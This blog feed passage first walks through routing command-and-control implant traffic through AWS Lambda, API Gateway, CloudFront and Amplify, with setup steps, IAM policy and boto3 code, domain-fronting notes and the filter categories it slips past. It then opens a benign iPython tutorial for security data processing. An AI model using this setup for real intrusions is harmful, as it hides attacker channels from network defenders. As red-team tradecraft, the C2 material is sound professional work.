<li><strong>Function URLs execute an AWS Lambda that forwards HTTP requests and responses</strong>. In this approach, requests enter the AWS account via the Function URL HTTP endpoint and are handled by an AWS Lambda. This Lambda forwards requests and responses between the implant and a backend server of your choice. The backend server can be an EC2 instance in the same AWS account, or any other HTTP/S service that the Lambda can reach, including servers accessible on the Internet. This is the <a href="https://scottctaylor12.github.io/lambda-function-urls.html">approach from Scott Taylor</a> as mentioned above.</li>
<li><strong>The API gateway executing an AWS Lambda that forwards HTTP requests and responses</strong>. In this approach, requests enter the AWS account via the API gateway HTTP endpoint, and are handled by an instance of the AWS Lambda. <a href="https://blog.xpnsec.com/aws-lambda-redirector/">This approach</a> originally from Adam Chester is functionally very similar to the aforementioned Function URL approach, with the only differences being the entry point into the AWS account and the setup. Even though Adam and Scott had different Lambda functions in each of their blog posts, I found it was possible to use <a href="https://github.com/scottctaylor12/Red-Lambda/blob/main/lambda.py">Scott’s function</a> for both approaches. It is even possible to configure the same Lambda function instance to handle incoming requests from both a Function URL endpoint and one or more API Gateway endpoints at the same time. There are some differences in how the entrypoints have to be used depending on what type of API gateway is used and how it’s configured; these will be discussed below.</li>
<li><strong>CloudFront distribution forwarding to a back end service</strong>. In this approach, requests enter the AWS account via CloudFront, and can be forwarded to various backends, such as an AWS load balancer or Internet accessible URL. There are lots of online resources talking about how to set this up, so I won’t be going into a great deal of detail about it here, but be aware that some references are out of date when it comes to the domain fronting point that I’ve discussed above.</li>
<li><strong>API gateway direct proxying</strong>. In this approach, instead of taking requests from the API Gateway and sending them to a Lambda, you instead proxy them directly to a private resource or other URL. The private resource can be a <a href="https://aws.amazon.com/cloud-map/">Cloudmap</a> service (that you can point to an EC2 instance and port), an AWS Application Load Balancer <a href="https://docs.aws.amazon.com/elasticloadbalancing/latest/application/introduction.html">(ALB)</a> or a Network Load Balancer <a href="https://docs.aws.amazon.com/elasticloadbalancing/latest/network/introduction.html">(NLB)</a> and allows the traffic to be forwarded within the AWS account without transiting the Internet. The HTTP URI option allows forwarding to another Internet accessible URL.</li>
<li><strong>AWS Amplify application</strong>. In this approach, an Amplify application acts as a proxy to forward traffic to another Internet accessible location - such as an existing CloudFront distribution. An <a href="https://aws.amazon.com/amplify/">Amplify app</a> provides an easy way to quickly generate a web application that will be hosted on an auto generated domain name delivered through CloudFront at the <code class="language-plaintext highlighter-rouge">*.amplifyapp.com</code> domain.</li>
</ul>
<p>Out of these, my favorite approach is the API Gateway proxying method. In a coming section, I’ll talk at a high level about how to implement each of these approaches, as well as some of the more relevant details for C2 forwarding that apply. First however, given that it’s referenced in two of the above options, I want to go over the relevant differences between the two API Gateway types for C2 forwarding.</p>
<h1 id="api-gateway-rest-vs-http">API Gateway: REST vs HTTP</h1>
<p>The API gateway offers two main types of API - REST and HTTP. The API documentation provides a lot of information on choosing between these two types of gateway starting <a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-vs-rest.html">here</a>, but from our perspective of fronting C2 traffic the important points are as follows:</p>
<ul>
<li>The entry point URLs look the same for REST and HTTP types and fit the pattern of <code class="language-plaintext highlighter-rouge">https://<random_10_chr_str>.execute-api.<region>.amazonaws.com/<path></code>.</li>
<li>It is possible to perform domain fronting with HTTPS with another API gateway instance in the same region and of the same type (e.g. HTTP or REST).</li>
<li>Both types can be used to forward to a Lambda or to a HTTP URI or various other AWS services, although the integration of API stage names in entry point URLs can complicate how well this works for C2 as discussed in the next point.</li>
<li>The HTTP type is the only type that I have been able to configure to proxy services to a bare URI. The REST type requires that the <code class="language-plaintext highlighter-rouge">stage</code> be included at the start of the URI path. For example a REST API entrypoint would look like this <code class="language-plaintext highlighter-rouge">https://<rest-api>.execute-api.<region>.amazonaws.com/stage_name/</code>, whereas a HTTP one could look like this <code class="language-plaintext highlighter-rouge">https://<http-api>.execute-api.<region>.amazonaws.com/</code>. Some C2 servers can deal with additional path information in the URL without a problem although this does make certain proxying configurations more complex for REST types.</li>
</ul>
<p>Due to the last point alone, my preference is to use HTTP API gateway types instead of REST ones for C2 forwarding, whether via Lambda or direct proxying, and this is the implementation approach I recommend below in cases where the API gateway is used. This also means that my suggested method for implementing the API Gateway<->Lambda forwarder is different than the Serverless approach discussed in <a href="https://blog.xpnsec.com/aws-lambda-redirector/">Adam’s post</a>. I think this difference in approach is largely due to the rapid increase in functionality of AWS services over time - I don’t believe the HTTP API Gateway type was available back when Adam originally wrote his post.</p>
<h1 id="overview-and-implementation">Overview and implementation</h1>
<p>The following are instructions on how to implement each of the aforementioned C2 forwarding approaches and a summary of some of their relevant distinguishing features. The assumption I have made with the instructions is that the destination C2 server sits within the same AWS account as the AWS forwarding service being configured, and that you are following a minimal access permission model in your account. I haven’t made any specific assumptions about the rest of the C2 design in your network, although my design involved an additional reverse HTTP proxy that handled all implant HTTP traffic destined for the C2 box. In cases where I refer to an EC2 instance receiving HTTP/S from the AWS service forwarder - this was the box being referred to. If there’s interest, I can do a separate post on this design, but for the purpose of this post I’ve tried to keep the instructions generic.</p>
<p>The instructions are fairly bare bones, listing the minimal configuration settings you need to set to make the service functional, and assume you have fairly decent knowledge of how AWS networking, IAM and security groups work. You might need to refer to the AWS documentation for specific services to find where a particular referenced setting is set. These are the manual click-ops steps, but if you want to rapidly deploy and tear down your infrastructure you will obviously want to implement these steps in an Infrastructure as Code format.</p>
<h2 id="function-url-to-lambda">Function URL to Lambda</h2>
<p><strong>Summary</strong></p>
<ul>
<li><strong><em>URL format</em></strong>: <code class="language-plaintext highlighter-rouge">https://<random_32_char_value>.lambda-url.<aws_region>.on.aws</code></li>
<li><strong><em>HTTPS certificate</em></strong>: Valid certificate automatically provided on Function URL creation</li>
<li><strong><em>Palo Alto URL categories</em></strong>: <code class="language-plaintext highlighter-rouge">Computer and Internet Info</code>, <code class="language-plaintext highlighter-rouge">Low Risk</code></li>
<li><strong><em>Domain fronting</em></strong>: Works via Host header manipulation for HTTP and HTTPS for arbitrary values within the same region matching pattern <code class="language-plaintext highlighter-rouge">*.lambda-url.<aws_region>.on.aws</code></li>
</ul>
<p><strong>Setup</strong></p>
<p><a href="https://scottctaylor12.github.io/lambda-function-urls.html">Scott’s blog post</a> and associated <a href="https://github.com/scottctaylor12/Red-Lambda">Red Lambda Github repository</a> provide some instructions and CloudFormation code to implement a Lambda/Function URL forwarder and C2 system, but if your design is different its helpful to know know to do the Function URL and Lambda setup manually.</p>
<ol>
<li>
<p>Take the <a href="https://github.com/scottctaylor12/Red-Lambda/blob/main/lambda.py">Lambda code from Scott’s repository</a>. Depending on when you follow these instructions, you can also use <a href="https://github.com/stephenbradshaw/Red-Lambda/blob/main/lambda.py">my fork instead</a>, which is awaiting PR acceptance into Scott’s repository and fixes an issue with proper forwarding of binary responses from the backend C2 server.</p>
</li>
<li>
<p>Create a new Lambda using the Python 3.7 runtime (later versions will not work due to issues with the Python requests module).</p>
</li>
<li>
<p>The handler for the Lambda should be set to <code class="language-plaintext highlighter-rouge">lambda_function.redirector</code> assuming a code filename of <code class="language-plaintext highlighter-rouge">lambda_function.py</code>.</p>
</li>
<li>
<p>Set an environment variable of <code class="language-plaintext highlighter-rouge">TEAMSERVER</code> to point to the private IP address or name of the HTTPS capable service you want to redirect to.</p>
</li>
<li>
<p>Associate the appropriate VPC and subnet with the Lambda (these should match the VPC and subnet of the destination EC2 instance) and create a dedicated security group for the Lambda.</p>
</li>
<li>
<p>Add a security rule to the Security Group for the destination EC2 instance that allows HTTPS from the security group associated with the Lambda.</p>
</li>
<li>
<p>When creating the Lambda, choose to associate a Function URL with it.</p>
</li>
<li>
<p>The Lambda execution role should be a custom IAM role with the <code class="language-plaintext highlighter-rouge">AWSLambdaExecute</code> managed policy AND the following custom policy attached.</p>
</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "LambdaRedir",
"Effect": "Allow",
"Action": [
"ec2:CreateNetworkInterface",
"ec2:DeleteNetworkInterface",
"ec2:DescribeInstances",
"ec2:AttachNetworkInterface",
"ec2:DescribeNetworkInterfaces"
],
"Resource": "*"
}
]
}
</code></pre></div></div>
<p>An auto-generated Function URL address will be provided in the console once configuration is complete.</p>
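<p>If you’d rather script the Function URL setup than use the console, a rough boto3 sketch follows. The function name <code class="language-plaintext highlighter-rouge">redirector</code> is a placeholder for your own Lambda:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import boto3

lam = boto3.client('lambda')

# Attach a public (unauthenticated) Function URL to an existing Lambda
cfg = lam.create_function_url_config(FunctionName='redirector', AuthType='NONE')

# A public Function URL also needs a resource policy permitting invocation
lam.add_permission(
    FunctionName='redirector',
    StatementId='AllowPublicFunctionUrl',
    Action='lambda:InvokeFunctionUrl',
    Principal='*',
    FunctionUrlAuthType='NONE',
)
print(cfg['FunctionUrl'])
</code></pre></div></div>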
<h2 id="api-gateway-to-lambda">API Gateway to Lambda</h2>
<p><strong>Summary</strong></p>
<ul>
<li><strong><em>URL format</em></strong>: <code class="language-plaintext highlighter-rouge">https://<random_10_char_value>.execute-api.<region_name>.amazonaws.com/</code></li>
<li><strong><em>HTTPS certificate</em></strong>: Valid certificate automatically provided on API Gateway creation</li>
<li><strong><em>Palo Alto URL categories</em></strong>: <code class="language-plaintext highlighter-rouge">Computer and Internet Info</code>, <code class="language-plaintext highlighter-rouge">Low Risk</code></li>
<li><strong><em>Domain fronting</em></strong>: Works via Host header manipulation for HTTP and HTTPS for valid API Gateway domains in the same region and of the same type (REST or HTTP)</li>
</ul>
<p><strong>Setup</strong></p>
<p>As mentioned in the <a href="#api-gateway-rest-vs-http">API Gateway</a> section above, I prefer using the HTTP API Gateway type as opposed to the REST type, so my setup approach is different to the way that API Gateway/Lambda forwarding was setup in <a href="https://blog.xpnsec.com/aws-lambda-redirector/">Adam’s blog post</a>.</p>
<p>The setup is pretty straightforward.</p>
<ol>
<li>
<p>Set up a forwarder Lambda as described in the section above. This Lambda code works with both Function URL and API Gateway triggers. Given you are using API Gateway forwarding, you can skip the step where you enable a Function URL if you like, or leave it if you want both entrypoints enabled.</p>
</li>
<li>
<p>Create a <code class="language-plaintext highlighter-rouge">HTTP</code> API Gateway instance.</p>
</li>
<li>
<p>Create a <code class="language-plaintext highlighter-rouge">/{proxy+}</code> resource for the <code class="language-plaintext highlighter-rouge">ANY</code> method.</p>
</li>
<li>
<p>Add an AWS Lambda integration, pick the region where your Lambda resides and the Lambda name. There will be an option <code class="language-plaintext highlighter-rouge">Grant API Gateway permission to invoke your Lambda function</code> which you can leave selected. No authorizer is required.</p>
</li>
<li>
<p>Create a <code class="language-plaintext highlighter-rouge">$default</code> stage and enable automatic deployment.</p>
</li>
</ol>
<p>The invoke URL will be provided on the summary page for the gateway.</p>
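<p>For repeatable deployments, the HTTP API “quick create” operation can achieve roughly the same result from boto3. This is a sketch only - the Lambda ARN is a placeholder, and API Gateway also needs permission to invoke the function, granted here via <code class="language-plaintext highlighter-rouge">add_permission</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import boto3

apigw = boto3.client('apigatewayv2')

# Quick create builds the API, a $default stage with auto-deploy,
# and a default route integrated with the target Lambda
api = apigw.create_api(
    Name='c2-forwarder',
    ProtocolType='HTTP',
    Target='arn:aws:lambda:us-east-1:123456789012:function:redirector',
)

# Allow API Gateway to invoke the Lambda
boto3.client('lambda').add_permission(
    FunctionName='redirector',
    StatementId='AllowApiGatewayInvoke',
    Action='lambda:InvokeFunction',
    Principal='apigateway.amazonaws.com',
)
print(api['ApiEndpoint'])
</code></pre></div></div>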
<h2 id="cloudfront-distribution-forwarding">CloudFront distribution forwarding</h2>
<p><strong>Summary</strong></p>
<ul>
<li><strong><em>URL format</em></strong>: <code class="language-plaintext highlighter-rouge">https://<13_character_random_value>.cloudfront.net/</code></li>
<li><strong><em>HTTPS certificate</em></strong>: Valid certificate automatically provided on CloudFront distribution creation</li>
<li><strong><em>Palo Alto URL categories</em></strong>: <code class="language-plaintext highlighter-rouge">Content Delivery Networks</code>, <code class="language-plaintext highlighter-rouge">Low Risk</code> for *cloudfront.net URLS, or domain dependant for custom domains</li>
<li><strong><em>Domain fronting</em></strong>: Works via Host header for HTTP, requires using SNI as part of the TLS session initiation set to the same value as the host header for HTTPS for other valid sites delivered by the CDN</li>
</ul>
<p><strong>Setup</strong></p>
<p>There are dozens of resources on the Internet that describe how to use CloudFront as a forwarder for C2, so I won’t go into detail on how to configure it here; you can check one of the many other resources for detailed instructions. Amongst those linked above, I also used <a href="https://www.blackhillsinfosec.com/using-cloudfront-to-relay-cobalt-strike-traffic/">this</a> as a reference when setting up my POC.</p>
<p>I will provide some general notes and tips I had about the creation process.</p>
<p>Using a CloudFront distribution for C2 fronting requires:</p>
<ul>
<li>An AWS load balancer of some type (ALB, NLB or classic) setup to forward traffic to the destination HTTP/S service (e.g. EC2 instance)</li>
<li>A custom domain and AWS hosted SSL certificate <strong>IF</strong> use of a custom domain is desired</li>
</ul>
<p>Each of the different load balancer options has different characteristics that might influence the right option to choose depending on the environment.</p>
<ul>
<li>The ALB requires that you specify at least two subnets in different availability zones as traffic destinations to be selected during setup, so may not be suitable for single AZ setups.</li>
<li>The NLB does a direct pass through of the client IP address to the destination EC2 instance, so does require that Internet access rules be applied in the security group associated with the EC2 instance. To restrict access to only CloudFront origin endpoints (as opposed to the entire Internet) requires in the neighbourhood of 55 rules to be added to the security group. This may require a limit increase in the associated AWS account if many existing rules are already present, as the default maximum rules in a security group is 60.</li>
<li>The Classic Load Balancer is considered to be “out of date” technology but does not have any current end of life set and does work reliably. It does not have either of the aforementioned restrictions, having its own dedicated security group and no requirement for multiple availability zone routing. The main downside is the mandatory health check requests generating unnecessary log entries on the destination HTTP/S service.</li>
</ul>
<p>To set up a classic load balancer, add one in the same VPC as the destination EC2 instance, create a dedicated security group and add a rule to allow traffic to port 80 from the managed prefix list <code class="language-plaintext highlighter-rouge">com.amazonaws.global.cloudfront.origin-facing</code> - this allows only traffic from the CloudFront servers to reach the load balancer. The id of the list can be looked up in the Managed prefix lists section of the VPC console in order to add it to the security group - this was <code class="language-plaintext highlighter-rouge">pl-b8a742d1</code> at the time this post was written. The origin in the CloudFront distribution should then be set to forward traffic using HTTP.</p>
<p>If access via a custom domain is required, the domain needs to have an SSL certificate added with all desired names (e.g. domain.com, www.domain.com) for the domain in the us-east-1 (N. Virginia) region. That certificate can then be selected in the Custom SSL Certificate section of the distribution’s settings. The names in the certificate should include all of the Alternate Domain Name (CNAME) entries in the distribution. A link to the appropriate section of the AWS console to create the certificate is shown in the wizard for creating a CloudFront distribution.</p>
<p>Other than the two previously mentioned options, the other important values to set in the distribution relate to forwarding behavior - specifically the caching and allowable HTTP methods. Allow all HTTP methods and use Legacy cache settings selecting All for Headers, Query strings and Cookies.</p>
<p>The distribution domain name will be provided in the settings.</p>
<h2 id="api-gateway-direct-proxying">API Gateway direct proxying</h2>
<p><strong>Summary</strong></p>
<ul>
<li><strong><em>URL format</em></strong>: <code class="language-plaintext highlighter-rouge">https://<random_10_char_value>.execute-api.<region_name>.amazonaws.com/</code></li>
<li><strong><em>HTTPS certificate</em></strong>: Valid certificate automatically provided on API Gateway creation</li>
<li><strong><em>Palo Alto URL categories</em></strong>: <code class="language-plaintext highlighter-rouge">Computer and Internet Info</code>, <code class="language-plaintext highlighter-rouge">Low Risk</code></li>
<li><strong><em>Domain fronting</em></strong>: Works via Host header manipulation for HTTP and HTTPS for valid API Gateway domains in the same region and of the same type (REST or HTTP)</li>
</ul>
<p><strong>Setup</strong></p>
<p>The API Gateway direct proxying approach allows you to forward to an Internet accessible URI or a private resource. For cases where the C2 sits in the same AWS account as the forwarding service, a private resource is preferable as it does not require that you expose your C2 service directly on the Internet, and you can save on AWS network traffic transit costs. For a private resource you can forward to a load balancer or a Cloud Map service that points to one or more services running on cloud resources (e.g. web servers on EC2 instances) that you want to receive your forwarded traffic. I chose to use a Cloud Map service pointing to port 80 on an EC2 instance as it was more cost effective than a load balancer. Seeing as the forwarded traffic is internal to my AWS account, I forwarded it as HTTP rather than HTTPS.</p>
<p>The following instructions explain how to set up proxying to a Cloud Map service that will point to a target EC2 instance. Take note of the target EC2 instance’s private IP address, VPC and subnet before starting, as these details will be required:</p>
<ol>
<li>
<p>Set up an AWS Cloud Map namespace supporting <code class="language-plaintext highlighter-rouge">API calls and DNS queries in VPCs</code>. You can put it in the same VPC as your destination EC2 instance.</p>
</li>
<li>
<p>Create a Cloud Map <code class="language-plaintext highlighter-rouge">API and DNS</code> service within the namespace created in step 1.</p>
</li>
<li>
<p>Create a service instance within the service created in step 2. This service instance should point to the private IP address of the target EC2 instance and TCP port 80.</p>
</li>
<li>
<p>Create a security group in the VPC/subnet where the target EC2 instance resides that can be used to associate with a VPC link. This will be used to allow the VPC link and hence the API gateway to talk <strong>TO</strong> the destination EC2 instance.</p>
</li>
<li>
<p>Add a rule to the target EC2 instance’s security group that allows connections <strong>FROM</strong> the security group created in step 4 to the same service port configured in the Cloud Map service instance (e.g. 80/HTTP).</p>
</li>
<li>
<p>Create an API Gateway VPC link for HTTP APIs to provide a path for the API Gateway to communicate with the VPC and subnet where the destination EC2 instance resides.</p>
</li>
<li>
<p>Associate the VPC link created in step 6 with the VPC and subnet that the target EC2 instance resides in and the security group created in step 4.</p>
</li>
<li>
<p>Create an API Gateway <code class="language-plaintext highlighter-rouge">HTTP</code> API instance, without creating an initial integration. Keep the default <code class="language-plaintext highlighter-rouge">$default</code> deployment stage with automated deployment.</p>
</li>
<li>
<p>In the new API gateway, create a route with pattern <code class="language-plaintext highlighter-rouge">/{proxy+}</code> for the <code class="language-plaintext highlighter-rouge">ANY</code> method.</p>
</li>
<li>
<p>In the new API gateway, create a private resource integration that points to the Cloud Map service created in step 2. Associate the VPC link created in step 7 with the integration.</p>
</li>
<li>
<p>Attach the integration created in step 9 to the route created in step 8.</p>
</li>
</ol>
<p>The invoke URL will be shown in the stage configuration page.</p>
<h2 id="aws-amplify-application">AWS Amplify application</h2>
<p><strong>Summary</strong></p>
<ul>
<li><strong><em>URL format</em></strong>: <code class="language-plaintext highlighter-rouge">https://<stage_name>.<14_character_random_value>.amplifyapp.com/</code></li>
<li><strong><em>HTTPS certificate</em></strong>: Valid certificate automatically provided on Amplify app creation</li>
<li><strong><em>Palo Alto URL categories</em></strong>: <code class="language-plaintext highlighter-rouge">Business and Economy</code>, <code class="language-plaintext highlighter-rouge">Low Risk</code></li>
<li><strong><em>Domain fronting</em></strong>: Delivered through the CloudFront CDN, so the same domain fronting conditions for CloudFront as discussed above apply</li>
</ul>
<p><strong>Setup</strong></p>
<p>The AWS Amplify fronting method requires an Internet accessible URI to forward traffic to. Once you have this, you can create an Amplify application with an empty code deployment and then configure rewriting to redirect all requests to the application to your desired site. The site is delivered via CloudFront, and visitors to the site won’t be able to tell they are being redirected. Set it up like so:</p>
<ol>
<li>Create a new AWS Amplify hosted environment. Choose a manual file upload based distribution and upload an empty zip file. Something like the following can be used to create a zip file test1.zip in the PWD from empty folder /tmp/test.</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python -c 'import shutil; shutil.make_archive("test1", "zip", "/tmp/test")'
</code></pre></div></div>
<ol start="2">
<li>Then in the Rewrites and Redirects section of the settings, add a redirect from source <code class="language-plaintext highlighter-rouge">/<*></code> to target <code class="language-plaintext highlighter-rouge">https://web.site/<*></code> (or your custom destination) of type <code class="language-plaintext highlighter-rouge">200 (Rewrite)</code></li>
</ol>
<p>Once configured, the URL for the app will be available in a few locations throughout the Amplify interface.</p>Stephen BradshawRecently I’ve been looking into options for abusing AWS services to forward HTTP Command and Control (C2) traffic. This post will talk about a number of approaches for this I found discussed on the Internet as well as a few options that I identified myself.iPython for cyber security data processing and automation2023-08-16T07:12:00+00:002023-08-16T07:12:00+00:00/2023/08/16/iPython-for-cyber-security<p>A lot of my day job in pentesting/offensive security involves processing varied chunks of data, and ad hoc automation of tasks. For the last several years, I’ve been using iPython, the interactive Python environment, to do this. While iPython has pretty wide use in various other computing fields, to my knowledge it’s not used very widely in security. Whenever I have the rare opportunity to demonstrate how I use it to other pentesters however, they seem to be impressed by how useful it is. This post will be an attempt to explain why I think iPython is so useful for security related workflows.</p>
<h1 id="what-is-ipython-and-what-are-the-basics-of-using-it">What is iPython and what are the basics of using it?</h1>
<p>iPython is essentially a souped up version of a Python REPL (Read Evaluate Print Loop) - very much like what you get when you run python with no input script, but way more usable.</p>
<p>Being a REPL, what iPython does at its core is run code snippets, provide any output, and return to a prompt to allow you to repeat the process.</p>
<p>The following shows me starting iPython and using print to output a simple string.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@mac:~$ ipython
Python 3.10.12 (main, Jun 10 2023, 16:04:55) [Clang 14.0.3 (clang-1403.0.22.14.1)]
Type 'copyright', 'credits' or 'license' for more information
IPython 8.3.0 -- An enhanced Interactive Python. Type '?' for help.
In [1]: print('Hello from iPython!')
Hello from iPython!
</code></pre></div></div>
<p>Each input and output are numbered. Just entering a string in iPython returns that string as output, labelled below as <code class="language-plaintext highlighter-rouge">Out[2]</code>. I can retrieve that same output again in a subsequent input by referencing it by name.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
In [2]: 'Hello'
Out[2]: 'Hello'
In [3]: Out[2]
Out[3]: 'Hello'
</code></pre></div></div>
<p>This means that you don't lose access to output generated in previous steps if you want to refer to it again later in your processing.</p>
<p>You can print a history of commands, to see what you have run so far.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [4]: history
print('Hello from iPython!')
'Hello'
Out[2]
history
</code></pre></div></div>
<p>You can also assign output to variables explicitly, and then access them by name in later operations.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [5]: myvariable = 5412
In [6]: myvariable
Out[6]: 5412
</code></pre></div></div>
<p>iPython also has a startup file that you can use to specify code you want available in each session you start. On *nix systems, this file is located at <code class="language-plaintext highlighter-rouge">~/.ipython/profile_default/startup/startup.py</code>.</p>
<p>My startup file on each machine I use regularly contains one line, which I will explain in the following section.</p>
<h1 id="using-ipython-to-debug-python-scripts-or-run-code-from-external-scripts">Using iPython to debug Python scripts or run code from external scripts</h1>
<p>One great use of iPython is as a debugging and testing environment when creating larger Python programs. If you're writing a Python program which contains a standalone function to perform some particular task, and want to quickly test that function, running it within iPython is a great way to do so.</p>
<p>To facilitate this, you may want to put sections of Python code in a file on disk and import them into iPython to run them interactively.</p>
<p>My iPython startup file contains the following to do exactly this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>coder = lambda x : compile(open(x).read(), x, 'exec')
</code></pre></div></div>
<p>This is a helper lambda (one liner function) called <code class="language-plaintext highlighter-rouge">coder</code> that reads Python source from an external file and compiles it into a code object. The result is intended to be passed to the inbuilt function <code class="language-plaintext highlighter-rouge">exec</code>, which runs the provided script in the context of the current session.</p>
<p>When you do this you will get access to any local variables in the script in your iPython session. The following shows importing a two liner script <code class="language-plaintext highlighter-rouge">pythoncode.py</code> into the current session, and demonstrates how the variable <code class="language-plaintext highlighter-rouge">variablex</code> from the script is then available locally.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [7]: cat pythoncode.py
print('this is python code')
variablex = 'contents'
In [8]: exec(coder('pythoncode.py'))
this is python code
In [9]: variablex
Out[9]: 'contents'
</code></pre></div></div>
<p>You may notice from the above that we are able to run operating system commands such as <code class="language-plaintext highlighter-rouge">cat</code>, to display the contents of local files.</p>
<p>If the Python code we execute has any errors, this will also provide us with helpful output that identifies where the problem is. Let's look at an example of trying to import code with errors in file <code class="language-plaintext highlighter-rouge">badcode.py</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [10]: cat badcode.py
print('Good line')
invalid python
In [11]: exec(coder('badcode.py'))
Traceback (most recent call last):
File /opt/local/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/IPython/core/interactiveshell.py:3397 in run_code
exec(code_obj, self.user_global_ns, self.user_ns)
Input In [11] in <cell line: 1>
exec(coder('badcode.py'))
File ~/.ipython/profile_default/startup/startup.py:1 in <lambda>
coder = lambda x : compile(open(x).read(), x, 'exec')
File badcode.py:2
invalid python
^
SyntaxError: invalid syntax
</code></pre></div></div>
<p>We can see this output identifies exactly where in the external script the error is.</p>
<h1 id="magic-commands-and-ipython-conveniences">Magic commands and iPython conveniences</h1>
<p>iPython has a number of useful <a href="https://ipython.readthedocs.io/en/stable/interactive/magics.html">magic commands</a> that try to make common actions easier.</p>
<p>For example, copy the following text into your clipboard.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>print('these')
print('are')
print('multiple')
print('lines')
print('of')
print('code')
</code></pre></div></div>
<p>Then enter the command <code class="language-plaintext highlighter-rouge">%paste</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [12]: %paste
print('these')
print('are')
print('multiple')
print('lines')
print('of')
print('code')
## -- End pasted text --
these
are
multiple
lines
of
code
</code></pre></div></div>
<p>The code in the clipboard is automatically entered and executed.</p>
<p>iPython is also helpful in other ways. It can autocomplete filenames and paths as well as Python code (like in some good IDEs), and it can also autocomplete from your command history.</p>
<h1 id="some-useful-python-concepts">Some useful Python concepts</h1>
<p>Beyond the basics discussed above, making effective use of iPython relies on your knowledge of Python coding.</p>
<p>Before I go into specific code examples however, I want to specifically introduce a few concepts that are very useful when operating in a Python REPL.</p>
<h2 id="comprehensions">Comprehensions</h2>
<p>Comprehensions are a hugely useful way of succinctly specifying iterative operations. A comprehension creates a collection containing the results of the operation, with the type of the resulting data structure determined by the syntax used.</p>
<p>The simplest example I can think of is the <a href="https://docs.python.org/3/tutorial/datastructures.html">list</a> comprehension below. It simply creates a list of each element in the Python range of 1-4.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [16]: [a for a in range(1,5)]
Out[16]: [1, 2, 3, 4]
</code></pre></div></div>
<p>The basic format demonstrated here is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[<result> for <item> in <iterable>]
</code></pre></div></div>
<p>In this most basic of examples:</p>
<ul>
<li>The comprehension is wrapped in square brackets <code class="language-plaintext highlighter-rouge">[]</code>, indicating that the output will be a <code class="language-plaintext highlighter-rouge">list</code>,</li>
<li><code class="language-plaintext highlighter-rouge"><result></code> is the value that gets returned for each iteration of the loop,</li>
<li><code class="language-plaintext highlighter-rouge"><item></code> is the variable name to which each individual item from the iterable is assigned to <em>in that instance of the loop</em>, and</li>
<li><code class="language-plaintext highlighter-rouge"><iterable></code> is the collection being processed.</li>
</ul>
<p>In the case above, <code class="language-plaintext highlighter-rouge"><result></code> is the same as <code class="language-plaintext highlighter-rouge"><item></code>, but this can be changed by additional processing as you will see in future examples.</p>
<p>As well as for lists, comprehensions can also be used in different contexts, such as for <a href="https://docs.python.org/3/tutorial/datastructures.html#dictionaries">dictionaries</a>, as in the example below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [18]: {a: 'hello' for a in range(1,5)}
Out[18]: {1: 'hello', 2: 'hello', 3: 'hello', 4: 'hello'}
</code></pre></div></div>
<p>The output type of the comprehension is defined by the internal syntax and the brackets wrapping the operation, e.g. <code class="language-plaintext highlighter-rouge">[]</code> list, <code class="language-plaintext highlighter-rouge">{}</code> set/dictionary, or <code class="language-plaintext highlighter-rouge">()</code> generator.</p>
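<p>As a quick illustrative sketch of the other two bracket forms (not taken from the session above):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Set comprehension: curly braces and a single expression, unique values only
{a % 2 for a in range(1, 5)}      # {0, 1}

# Generator expression: parentheses, produces a lazily evaluated iterator
(a * a for a in range(1, 5))      # <generator object <genexpr> at 0x...>
</code></pre></div></div>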
<p>Comprehensions can also be nested to arbitrary levels, contain conditions and perform additional operations on the elements of the output. They can get ridiculously complex, and can take some getting used to in their more involved forms. However, they are incredibly powerful and useful in iPython interactive computing. More complex comprehensions will be included in the examples below.</p>
<h2 id="lambdas">Lambdas</h2>
<p>Lambdas are one line functions. You have seen one example of these already from my <code class="language-plaintext highlighter-rouge">coder</code> startup function. Here's another example where I define a new lambda named <code class="language-plaintext highlighter-rouge">mylambda</code>, with input variables <code class="language-plaintext highlighter-rouge">x</code> and <code class="language-plaintext highlighter-rouge">y</code>, and then execute it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [19]: mylambda = lambda x, y : print('Hello {}, its {}'.format(x, y))
In [20]: mylambda('you', 'good to see you!')
Hello you, its good to see you!
</code></pre></div></div>
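<p>A common practical use of lambdas in interactive work is as throwaway key functions. A small illustrative example (not from the session above) that sorts host/port tuples by port:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Sort (host, port) tuples by the port value using a lambda as the key
endpoints = [('10.0.0.2', 443), ('10.0.0.1', 22), ('10.0.0.3', 8080)]
sorted(endpoints, key=lambda e: e[1])
# [('10.0.0.1', 22), ('10.0.0.2', 443), ('10.0.0.3', 8080)]
</code></pre></div></div>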
<h1 id="common-tasks-performed-in-python">Common tasks performed in Python</h1>
<p>Now let's look at some specific examples of common tasks that will be very helpful to know about in order to make effective use of iPython for security data processing.</p>
<h2 id="reading-a-file">Reading a file</h2>
<p>Reading a text file is as easy as the following. Here we read text file <code class="language-plaintext highlighter-rouge">file1.txt</code>, which contains 5 lines.</p>
